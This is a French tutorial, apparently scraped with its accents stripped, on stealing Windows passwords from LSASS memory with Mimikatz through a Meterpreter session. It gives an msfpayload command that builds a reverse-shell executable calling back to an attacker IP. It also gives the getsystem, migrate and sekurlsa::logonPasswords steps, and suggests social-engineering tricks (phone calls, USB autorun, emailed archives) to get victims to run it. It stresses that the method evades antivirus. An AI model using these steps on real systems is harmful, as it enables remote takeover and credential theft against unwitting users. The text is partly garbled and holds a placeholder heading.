Professional Documents
Culture Documents
ARTICLES ASSOCIES
Prambule
Dans un article prcdent nous prsentions le fonctionnement du logiciel Mimikatz dvelopp par
Benjamin DELPY. Nous avons ainsi pu constater que son module sekurlsa permettait la
rcupration de mots de passe contenus dans le processus systme LSASS de Windows.
A la suite, nous allons prsenter un autre module de Mimikatz permettant lextraction de mots de
passe partir dun dump . Pour information, un dump constitue une extraction mmoire dun
processus donn. Dans notre cas, lobjectif sera de raliser un dump du processus LSASS afin de
lanalyser avec le module minidump . Cette technique a pour avantage de ne dclencher
aucune action dtectable par les antivirus. Dans ce sens, son utilisation prsente un intrt majeur
lors de la ralisation dun dump sur une machine distante.
Contexte :
1. XXX
Pour mener bien cette attaque, lattaquant doit prparer un shellcode (ou programme de
contrle distance) qui devra tre excut sur le poste de la victime. Pour excuter ledit programme,
lattaquant dispose de deux techniques :
La premire, dite locale, consiste faire excuter le shellcode par la victime. Pour cela,
des techniques de social-engineering peuvent tre utilises. Exemples :
o Placer le shellcode sur le bureau de la victime et lui faire excuter en lappelant par
tlphone
o Crer une tche planifie excutant le shellcode
o Placer le shellcode sur une clef USB et lexcuter via la fonction Autorun
o Envoyer le shellcode par mail la victime (de prfrence dans un fichier comprim)
et lui faire excuter selon les instructions indiques dans le mail
La seconde, dite distante, consiste excuter le shellcode via loutil PSexec . Elle
suppose la connaissance didentifiants avec un privilge dadministration sur la machine cible.
Lutilisation de PSexec est prsente au point 1.2 de cet article.
1.1 Attaque
1.1.1 Prparation du shellcode
Pour commencer, crez le binaire allant tre excut sur la machine cible (source) :
msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.92.131 X > Meterpreter.exe
Initiez une session avec le client choisi en indiquant son identifiant (ici) :
sessions -i 1
Comme vous pouvez le constater, le systme est en 64 bits tandis que Meterpreter en 32 bits. Pour
viter de charger uniquement les modules 32 bits de Mimikatz (et se retrouver face une erreur), il
est ncessaire de migrer Meterpreter dans un processus 64 bits.
Si Meterpreter lanc localement (sans psexec):
getsystem
Migration dans un nouveau processus en 64 bits excut en compte system (svhost de prfrence).
Surtout pas migrer dans LSASS. Le compte excutant le processus ne sera affich que si vous
disposez du privlge system
ps
migrate <ID process>
Chargement de Mimikatz
load mimikatz
Excution de Mimikatz
mimikatz_command -f privilege::debug
mimikatz_command -f sekurlsa::logonPasswords
Domaine user